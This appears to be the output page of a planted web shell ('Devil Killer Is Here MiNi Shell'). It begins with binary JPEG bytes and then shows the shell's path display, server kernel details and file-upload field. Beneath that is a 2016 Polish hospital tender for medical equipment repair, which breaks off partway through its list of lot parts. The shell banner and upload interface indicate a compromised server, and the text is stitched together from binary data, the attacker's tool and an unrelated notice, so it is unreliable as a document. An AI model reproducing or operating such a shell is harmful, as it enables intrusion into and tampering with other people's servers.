JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160720/146755-N-2016.html

<p class="kh_header"><b>Wrocław: Usługi przeglądów, napraw i konserwacji aparatury medycznej</b><br>
<b>Numer ogłoszenia: 146755 - 2016; data zamieszczenia: 20.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląski Szpital Specjalistyczny im. T. Marciniaka - Centrum Medycyny Ratunkowej , ul. Gen. A. E. Fieldorfa 2, 54-049 Wrocław, woj. dolnośląskie, tel. 71 306 44 19, faks 71 306 48 67.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-marciniak.wroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi przeglądów, napraw i konserwacji aparatury medycznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia są usługi przeglądów, napraw i konserwacji aparatury medycznej przez okres 12 miesięcy według wymienionych niżej części:
Zadanie 1 - 	Naprawa aparatów do znieczulania,
Zadanie 2 -	Naprawa analizatorów,
Zadanie 3 -	Naprawa stołów,
Zadanie 4 -	Naprawa aparatów EMG,
Zadanie 5 -	Naprawa myjek ultradźwiękowych,
Zadanie 6 -	Naprawa aparatów EKG i EKG ze spirometrem,
Zadanie 7 -	Naprawa aparatu RTG,
Zadanie 8 -	Naprawa defibrylatorów,
Zadanie 9 -	Naprawa ogrzewaczy pacjenta,
Zadanie 10 -	Naprawa podgrzewaczy płynów infuzyjnych,
Zadanie 11 -	Naprawa diatermii,
Zadanie 12 -	Naprawa generatora do ablacji prądem RF,
Zadanie 13 -	Naprawa kapnometrów,
Zadanie 14 -	Naprawa pił,
Zadanie 15 -	Naprawa pomp infuzyjnych,
Zadanie 16 -	Naprawa rejestratorów,
Zadanie 17 -	Naprawa łóżek,
Zadanie 18 -	Naprawa mikroskopów operacyjnych,
Zadanie 19 -	Naprawa modułów,
Zadanie 20 -	Naprawa aparatów RTG,
Zadanie 21 -	Naprawa aparatu EKG,
Zadanie 22 -	Naprawa łóżka kąpielowego,
Zadanie 23 -	Naprawa aparatu RTG ,
Zadanie 24 -	Naprawa stołów Trumpf,
Zadanie 25 -	Naprawa pomp infuzyjnych,
Zadanie 26 -	Naprawa diatermii Erbe,
Zadanie 27 -	Naprawa aparatu RTG Ziehm,
Zadanie 28 -	Przegląd aparatów do znieczulania,
Zadanie 29 -	Przegląd analizatorów,
Zadanie 30 -	Przegląd aparatów do krioterapii,
Zadanie 31 -	Przegląd aparatu do termoalblacji wątroby,
Zadanie 32 -	Przegląd aparatów EMG,
Zadanie 33 -	Przegląd aspiratora CUSA,
Zadanie 34 -	Przegląd audiometru,
Zadanie 35 -	Przegląd bieżni,
Zadanie 36 -	Przegląd Kerrisona pneumatycznego,
Zadanie 37 -	Przegląd aparatu RTG,
Zadanie 38 -	Przegląd diatermii,
Zadanie 39 -	Przegląd generatora do ablacji prądem RF,
Zadanie 40 -	Przegląd aparatów RTG,
Zadanie 41 -	Przegląd aparatu RTG,
Zadanie 42 -	Przegląd aparatu RTG Ziehm,
Zadanie 43 -	Konserwacja respiratorów.
Powyższe części przedmiotu zamówienia wykazane zostały w: 
- Wykazie Aparatury, stanowiącym integralną część SIWZ, w przypadku wyboru oferty najkorzystniejszej stanowić on będzie następnie załącznik do umowy;
- Formularzu cenowym, stanowiącym integralną część SIWZ, w przypadku wyboru oferty najkorzystniejszej stanowić on będzie następnie załącznik do umowy.
Miejsce wykonania ww. usług - siedziba Zamawiającego przy ul. Gen. A. E. Fieldorfa 2 we Wrocławiu.
1.2. Warunki umowne realizacji przedmiotowego zamówienia publicznego zawierają wzory umów, stanowiące integralną część SIWZ. 
Szacunkowa wartość przedmiotu zamówienia: 267.160,00 zł netto.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.42.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 43.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie pobiera się</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek udziału w postępowaniu, jeśli Wykonawca oświadczy jego spełnianie Ocena spełniania warunków wymaganych od Wykonawcy w postępowaniu o zamówienie publiczne dokonana zostanie w oparciu o treść złożonych oświadczeń, z zastrzeżeniem art. 26 ust. 3 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek udziału w postępowaniu, jeśli Wykonawca oświadczy jego spełnianie Ocena spełniania warunków wymaganych od Wykonawcy w postępowaniu o zamówienie publiczne dokonana zostanie w oparciu o treść złożonych oświadczeń, z zastrzeżeniem art. 26 ust. 3 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek udziału w postępowaniu, jeśli Wykonawca oświadczy jego spełnianie Ocena spełniania warunków wymaganych od Wykonawcy w postępowaniu o zamówienie publiczne dokonana zostanie w oparciu o treść złożonych oświadczeń, z zastrzeżeniem art. 26 ust. 3 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek udziału w postępowaniu, jeśli Wykonawca oświadczy jego spełnianie Ocena spełniania warunków wymaganych od Wykonawcy w postępowaniu o zamówienie publiczne dokonana zostanie w oparciu o treść złożonych oświadczeń, z zastrzeżeniem art. 26 ust. 3 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek udziału w postępowaniu, jeśli Wykonawca oświadczy jego spełnianie Ocena spełniania warunków wymaganych od Wykonawcy w postępowaniu o zamówienie publiczne dokonana zostanie w oparciu o treść złożonych oświadczeń, z zastrzeżeniem art. 26 ust. 3 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) ofertę Wykonawcy - zgodnie z wzorem przedłożonym przez Zamawiającego, stanowiącym integralną część SIWZ, b) wypełniony Formularz cenowy - zgodnie z wzorem przedłożonym przez Zamawiającego, stanowiącym integralną część SIWZ, który stanowić będzie następnie załącznik nr 1 do umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>wzór I § 7 ust. 7. Wykonawca gwarantuje stałe i niezmienne ceny przez okres obowiązywania umowy. § 7 ust. 8. Wykonawca gwarantuje stałe i niezmienne ceny przez okres obowiązywania umowy. Stałość cen, o której mowa w ust. 7, nie dotyczy obniżenia przez Wykonawcę ceny usług wykazanych w załączniku 2, z przyczyn nie ujętych w niniejszej umowie, w całym okresie obowiązywania umowy. § 7 ust. 9. Wykonawca gwarantuje stałe i niezmienne ceny przez okres obowiązywania umowy. § 7 ust. 10. W przypadku zmian stawek podatku VAT, zmiany wysokości minimalnego wynagrodzenia za pracę, zmiany zasad i wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne w przypadku gdy mają one wpływ na koszty wykonania przedmiotu zamówienia, wprowadza się możliwość wprowadzenia tych zmian na podstawie obowiązujących przepisów prawnych w tym zakresie. Ciężar udowodnienia zmiany wynagrodzenia o wskazane powyżej przypadki spoczywa na Wykonawcy. § 7 ust. 11. Wykonawca gwarantuje stałe i niezmienne ceny przez okres obowiązywania umowy. Zmiana załącznika nr 2 wymaga zmiany umowy w formie aneksu zgodnie z § 11 ust. 4 umowy. § 7 ust. 12. Wykonawca gwarantuje stałe i niezmienne ceny przez okres obowiązywania umowy. W przypadku zmiany ustawowej stawki VAT, zmiana wynagrodzenia objętego niniejszą umową wynikająca ze zmiany stawki VAT następuje z dniem wejścia w życie aktu prawnego zmieniającego tą stawkę. § 11 ust. 4. Zmiany umowy wymagają zachowania formy pisemnego aneksu podpisanego przez obie strony pod rygorem nieważności z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych. § 11 ust. 5. Oprócz wypadków wskazanych w § 7 Strony umowy zastrzegają sobie prawo do wprowadzenia zmian w przypadkach określonych poniżej: 1) zmiana danych Zamawiającego i Wykonawcy (nazwy, siedziby, nr ewidencyjnego NIP, REGON, formy prawnej itd.), 2) zmiana konta bankowego, 3) w przypadku nie wykorzystania wartości wynagrodzenia wykazanej w §7 ust. 1 Zamawiający może przedłużyć termin obowiązywania umowy, o którym mowa w § 10 ust. 1 nie więcej niż o 6 miesięcy, 4) zmiana osób wykazanych w § 4 umowy, 5) zmiana załącznika nr 1, w przypadku kasacji aparatu (aparatów). § 11 ust. 6. W sprawach nie uregulowanych niniejszą umową zastosowanie mają przepisy ustawy Prawo zamówień publicznych oraz Kodeksu cywilnego. § 11 ust. 7. Spory mogące wynikać w związku z realizacją umowy strony zobowiązują się rozstrzygać polubownie na drodze negocjacji. W razie braku porozumienia, tj. gdy w terminie 30 dni od dnia podjęcia negocjacji strony nie osiągnęły porozumienia - spory rozstrzygał będzie sąd właściwy dla miejsca siedziby Zamawiającego. wzór II § 7 ust. 4. Wykonawca gwarantuje stałe i niezmienne ceny przez okres obowiązywania umowy. § 7 ust. 5. Stałość cen, o której mowa w ust. 4, nie dotyczy obniżenia przez Wykonawcę ceny usług wykazanych w załączniku 2, z przyczyn nie ujętych w niniejszej umowie, w całym okresie obowiązywania umowy. § 7 ust. 6. W przypadku zmian stawek podatku VAT, zmiany wysokości minimalnego wynagrodzenia za pracę, zmiany zasad i wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne w przypadku gdy mają one wpływ na koszty wykonania przedmiotu zamówienia, wprowadza się możliwość wprowadzenia tych zmian na podstawie obowiązujących przepisów prawnych w tym zakresie. Ciężar udowodnienia zmiany wynagrodzenia o wskazane powyżej przypadki spoczywa na Wykonawcy. § 7 ust. 7. Zmiana załącznika nr 2 wymaga zmiany umowy w formie aneksu zgodnie z § 11 ust. 4 umowy. § 7 ust. 8. W przypadku zmiany ustawowej stawki VAT, zmiana wynagrodzenia objętego niniejszą umową wynikająca ze zmiany stawki VAT następuje z dniem wejścia w życie aktu prawnego zmieniającego tą stawkę. § 11 ust. 4. Zmiany umowy wymagają zachowania formy pisemnego aneksu podpisanego przez obie strony pod rygorem nieważności z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych. § 11 ust. 5. Oprócz wypadków wskazanych w § 7 Strony umowy zastrzegają sobie prawo do wprowadzenia zmian w przypadkach określonych poniżej: 1) zmiana danych Zamawiającego i Wykonawcy (nazwy, siedziby, nr ewidencyjnego NIP, REGON, formy prawnej itd.), 2) zmiana konta bankowego, 3) zmiana osób wykazanych w § 4 umowy, 4) zmiana załącznika nr 1, w przypadku kasacji aparatu (aparatów). § 11 ust. 6. W sprawach nie uregulowanych niniejszą umową zastosowanie mają przepisy ustawy Prawo zamówień publicznych oraz Kodeksu cywilnego. § 11 ust. 7. Spory mogące wynikać w związku z realizacją umowy strony zobowiązują się rozstrzygać polubownie na drodze negocjacji. W razie braku porozumienia, tj. gdy w terminie 30 dni od dnia podjęcia negocjacji strony nie osiągnęły porozumienia - spory rozstrzygał będzie sąd właściwy dla miejsca siedziby Zamawiającego. wzór III § 8 ust. 1. (...) Wynagrodzenie ryczałtowe może ulec zmianie w wypadku kasacji aparatu objętego umową, a jego wysokość ulegnie zmniejszeniu o kwotę ryczałtu miesięcznego skasowanego aparatu zgodnie z Załącznikiem nr 2 do niniejszej umowy. § 8 ust. 5. Wykonawca gwarantuje stałe i niezmienne ceny przez okres obowiązywania umowy. § 8 ust. 6. Stałość cen, o której mowa w ust. 5, nie dotyczy obniżenia przez Wykonawcę ceny usług wykazanych w załączniku 2, z przyczyn nie ujętych w niniejszej umowie, w całym okresie obowiązywania umowy. § 8 ust. 7. W przypadku zmian stawek podatku VAT, zmiany wysokości minimalnego wynagrodzenia za pracę, zmiany zasad i wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne w przypadku gdy mają one wpływ na koszty wykonania przedmiotu zamówienia, wprowadza się możliwość wprowadzenia tych zmian na podstawie obowiązujących przepisów prawnych w tym zakresie. Ciężar udowodnienia zmiany wynagrodzenia o wskazane powyżej przypadki spoczywa na Wykonawcy. § 8 ust. 8. Zmiana załącznika nr 2 wymaga zmiany umowy w formie aneksu zgodnie z § 12 ust. 4 umowy. § 8 ust. 9. W przypadku zmiany ustawowej stawki VAT, zmiana wynagrodzenia objętego niniejszą umową wynikająca ze zmiany stawki VAT następuje z dniem wejścia w życie aktu prawnego zmieniającego tą stawkę. § 12 ust. 4. Zmiany umowy wymagają zachowania formy pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych. § 12 ust. 5. Oprócz wypadków wskazanych w §8, Strony umowy zastrzegają sobie prawo do wprowadzenia zmian w umowie w wypadkach określonych poniżej: 1)zmiana danych Zamawiającego i Wykonawcy (nazwy, siedziby, nr ewidencyjnego NIP, REGON, formy prawnej itd.), 2)zmiana osób wykazanych w § 4, 3)zmiana konta bankowego, 4)zmiana załącznika nr 1, w przypadku kasacji aparatu (aparatów). § 12 ust. 6. W sprawach nie uregulowanych niniejszą umową zastosowanie mają przepisy ustawy Prawo zamówień publicznych oraz Kodeksu cywilnego. § 12 ust. 7. Spory mogące wynikać w związku z realizacją umowy strony zobowiązują się rozstrzygać polubownie na drodze negocjacji. W razie braku porozumienia, tj. gdy w terminie 30 dni od dnia podjęcia negocjacji strony nie osiągnęły porozumienia - spory rozstrzygał będzie sąd właściwy dla miejsca siedziby Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.szpital-marciniak.wroclaw.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 54-049 Wrocław ul. Gen. A. E. Fieldorfa 2, II piętro, pok. 2925.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2016 godzina 10:00, miejsce: 54-049 Wrocław ul. Gen. A. E. Fieldorfa 2, I piętro, pok. 1905.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający wykluczy z przedmiotowego postępowania Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Naprawa aparatów do znieczulania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa aparatów do znieczulania, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - Naprawa analizatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa analizatorów, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - Naprawa stołów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa stołów, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4 - Naprawa aparatów EMG.</p>
